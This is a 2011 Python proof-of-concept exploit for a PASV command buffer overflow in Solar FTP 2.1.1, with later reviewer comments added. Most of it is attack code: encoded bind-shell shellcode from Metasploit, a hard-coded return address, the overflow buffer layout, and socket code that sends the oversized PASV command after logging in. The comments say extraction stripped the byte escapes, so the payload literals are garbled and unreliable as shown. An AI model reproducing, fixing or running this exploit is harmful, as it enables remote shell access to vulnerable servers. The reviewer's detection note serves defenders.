Solar FTP 2.1.1 PASV Buffer Overflow
Posted on 13 July 2011
#!/usr/bin/python
#Title: Solar FTP 2.1.1 PASV Command PoC
#Authors: Craig Freyman (@cd1zz) and Gerardo Iglesias (@iglesiasgg)
#Tested: Windows XP SP3
#Vendor Contacted July 11, 2011
#Vendor Response: July 12, 2011 - Will fix ASAP, approved release of PoC.
#Notes: We found different offsets depending on the subnet that the server was running on.
#This particular exploit was run with the server running on 192.168.133.128. If you test this exploit and the
#app just crashes instead of running the shellcode, pass the exeptions through your debugger and after
#about 5 of them, you'll see EIP overwritten. If you can figure out why these offsets change, more power to you!
#We found the most consistent behavior using a total buffer of about 2127 bytes.
#
# NOTE(review): this copy was flattened by page extraction. The statements have been
# re-broken onto separate lines below, but every string literal is left exactly as
# extracted: the escape prefixes in the payload literals and the terminators inside
# the FTP command strings appear not to have survived, so those literals are plain
# ASCII text here, not the byte sequences the author's comments describe. The script
# is Python 2 throughout (print statement, backtick repr).
#
# Defender notes: RFC 959 defines PASV with no parameter, so a PASV verb carrying any
# argument at all -- here one of roughly 2 KB -- is anomalous on the wire and is the
# thing to alert on. The mitigation is the vendor fix referred to in the header.

import socket,sys,time,struct  # `time` is not used in the portion of the script visible here

if len(sys.argv) < 2:
    print "[-]Usage: %s <target addr> " % sys.argv[0]
    sys.exit(0)

target = sys.argv[1]

# Optional second argument; `platform` is never read in the visible script.
if len(sys.argv) > 2:
    platform = sys.argv[2]

#./msfpayload windows/shell_bind_tcp r | ./msfencode -e x86/shikata_ga_nai -b 'x00'
#[*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)
# Encoded payload as generated by the command above (26 x 14 + 4 = 368 bytes when the
# escapes are intact; see the extraction note at the top -- as pasted, len(shellcode)
# is the length of the ASCII text, so `junk` below is sized from that instead).
shellcode = ("xd9xcfxbex41xb0x13xe9xd9x74x24xf4x5fx29xc9"
             "xb1x56x31x77x18x03x77x18x83xc7x45x52xe6x15"
             "xadx1bx09xe6x2dx7cx83x03x1cxaexf7x40x0cx7e"
             "x73x04xbcxf5xd1xbdx37x7bxfexb2xf0x36xd8xfd"
             "x01xf7xe4x52xc1x99x98xa8x15x7axa0x62x68x7b"
             "xe5x9fx82x29xbexd4x30xdexcbxa9x88xdfx1bxa6"
             "xb0xa7x1ex79x44x12x20xaaxf4x29x6ax52x7fx75"
             "x4bx63xacx65xb7x2axd9x5ex43xadx0bxafxacx9f"
             "x73x7cx93x2fx7ex7cxd3x88x60x0bx2fxebx1dx0c"
             "xf4x91xf9x99xe9x32x8ax3axcaxc3x5fxdcx99xc8"
             "x14xaaxc6xccxabx7fx7dxe8x20x7ex52x78x72xa5"
             "x76x20x21xc4x2fx8cx84xf9x30x68x79x5cx3ax9b"
             "x6exe6x61xf4x43xd5x99x04xcbx6exe9x36x54xc5"
             "x65x7bx1dxc3x72x7cx34xb3xedx83xb6xc4x24x40"
             "xe2x94x5ex61x8ax7ex9fx8ex5fxd0xcfx20x0fx91"
             "xbfx80xffx79xaax0ex20x99xd5xc4x57x9dx1bx3c"
             "x34x4ax5exc2xabxd6xd7x24xa1xf6xb1xffx5dx35"
             "xe6x37xfax46xccx6bx53xd1x58x62x63xdex58xa0"
             "xc0x73xf0x23x92x9fxc5x52xa5xb5x6dx1cx9ex5e"
             "xe7x70x6dxfexf8x58x05x63x6ax07xd5xeax97x90"
             "x82xbbx66xe9x46x56xd0x43x74xabx84xacx3cx70"
             "x75x32xbdxf5xc1x10xadxc3xcax1cx99x9bx9cxca"
             "x77x5ax77xbdx21x34x24x17xa5xc1x06xa8xb3xcd"
             "x42x5ex5bx7fx3bx27x64xb0xabxafx1dxacx4bx4f"
             "xf4x74x7bx1ax54xdcx14xc3x0dx5cx79xf4xf8xa3"
             "x84x77x08x5cx73x67x79x59x3fx2fx92x13x50xda"
             "x94x80x51xcf")

#7C9572D8 JMP EAX
# NOTE(review): hard-coded address, meaningful only on the author's stated test host
# (Windows XP SP3, server on 192.168.133.128); this is what pins the PoC to one
# platform and explains the per-host offset sensitivity described in the header.
ret = struct.pack('<L', 0x7C9572D8) #works when the server is on 192.168.133.128

padding = "x43" * 100
junk = "x43" * (1900 - len(shellcode))  # shellcode + junk is always padded to 1900
frontpad = "x41" * 100 + "xebx30" + "x41" * 21
# Layout: frontpad | ret | padding | shellcode | junk. With real byte literals this is
# 123 + 4 + 100 + 1900 = 2127 bytes, matching the "about 2127 bytes" note in the header.
crash = frontpad + ret + padding + shellcode + junk

print "\n[*] Solar FTP 2.1.1 PASV Exploit \n[*] Authors: Craig Freyman (@cd1zz) and Gerardo Iglesias (@iglesiasgg) \n[*] Connecting to "+target

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
    s.connect((target,21))
except:
    # Bare except also swallows KeyboardInterrupt/SystemExit; `except socket.error`
    # would be the idiomatic form for a connection failure.
    print "[-] Connection to "+target+" failed!"
    sys.exit(0)

print "[*] Sending " + `len(crash)` + " byte PASV crash..."
# The replies to USER and PASS are read and discarded; nothing checks the server's
# response codes before the PASV line is sent.
s.send("USER test ")
s.recv(1024)
s.send("PASS test ")
s.recv(1024)
s.send("PASV " + crash + " ")
# (the script continues past the end of this excerpt)
